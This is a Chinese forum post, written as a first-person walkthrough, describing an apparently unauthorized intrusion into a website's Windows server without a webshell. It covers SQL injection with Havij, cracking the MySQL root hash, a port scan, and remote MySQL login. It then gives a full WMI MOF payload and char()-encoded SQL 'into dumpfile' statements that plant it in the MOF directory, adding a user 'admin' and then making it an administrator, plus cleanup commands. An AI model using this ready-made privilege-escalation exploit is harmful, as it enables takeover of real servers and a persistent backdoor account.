无shell情况下的mysql远程mof提权利用方法详解

扫到一个站的注入
<ignore_js_op> 
在havij中得到mysql数据库中mysql库保存的数据库密码：
<ignore_js_op> 
有时候发现1.15版的还是最好用，最稳定，虽然速度慢了一点。
照样放到坛子里让机油破了
<ignore_js_op> 
感谢Mr.Lu。顺便吐槽下，cmd5连个root都要收费。。。
在等着密码破解出来的时候顺便nmap了一下
<ignore_js_op> 
意外发现端口改到了1126，给后面省下了不少时间。
照常外连试试
<ignore_js_op> 
上个帖子里面有基友问这个软件是什么，我用的是navicat，感觉很好用的
现在的常规思路就是得到绝对路径，写一个小马，再进一步渗透。
但是网站上面暴不出路径，看看mysql的路径
用select @@basedir;命令可以看到；
<ignore_js_op> 
网站的路径大概差不多了，懒得一个一个试了，最近mof提权挺火的，上次失败了一次，这次再来试试好了。
Mof的科普文很多，大家有兴趣看看网盘链接这两个，很详细的，大家共同学习；

http://pan.baidu.com/share/link?shareid=438074&uk=101689864

http://pan.baidu.com/share/link?shareid=438077&uk=101689864mof文件内容为：

1. #pragma namespace("\\\\.\\root\\subscription")
3. instance of __EventFilter as $EventFilter
4. {
5.     EventNamespace = "Root\\Cimv2";
6.     Name  = "filtP2";
7.     Query = "Select * From __InstanceModificationEvent "
8.             "Where TargetInstance Isa \"Win32_LocalTime\" "
9.             "And TargetInstance.Second = 5";
10.     QueryLanguage = "WQL";
11. };
13. instance of ActiveScriptEventConsumer as $Consumer
14. {
15.     Name = "consPCSV2";
16.     ScriptingEngine = "JScript";
17.     ScriptText =
18.     "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
19. };
21. instance of __FilterToConsumerBinding
22. {
23.     Consumer   = $Consumer;
24.     Filter = $EventFilter;
25. };

复制代码

于没有马，不能按照网盘里面说的先传一个mof上去，我就直接一次性写入。
先是试了试直接将原来的语句写入，提示失败，原因就是语句里面很多“；回车”之类的符号。
然后就想转化为16进制或者asc码这样。
先试了16进制。
等了老半天什么还是登陆不上去，就放弃了，改用asc码，用的sql语句为：

1. select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';

复制代码

效果就是添加一个用户admin密码admin；
等了有5秒，登陆框的提示从
<ignore_js_op> 
变成了
<ignore_js_op> [size=0.83em]17 小时前 上传
下载附件 [size=0.83em](51.04 KB)



这时候才意识到一个问题，上面的语句只添加了用户，忘了提升为管理员了。。。
好吧，重新写一遍mof

1. select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';

复制代码

好了，这样就顺利登进去了；
<ignore_js_op> 

改天研究一下一次性完成添加管理员试试

现在默认它还是会过5s添加一次用户，解决方法就是:
第一 net stop winmgmt 停止服务，
第二 删除文件夹：C:\WINDOWS\system32\wbem\Repository\
第三 net start winmgmt 启动服务
还有其他方法在网盘的文件里面有写。

一路看起来挺顺利的，是因为上次研究过这个。这次写的详细点了。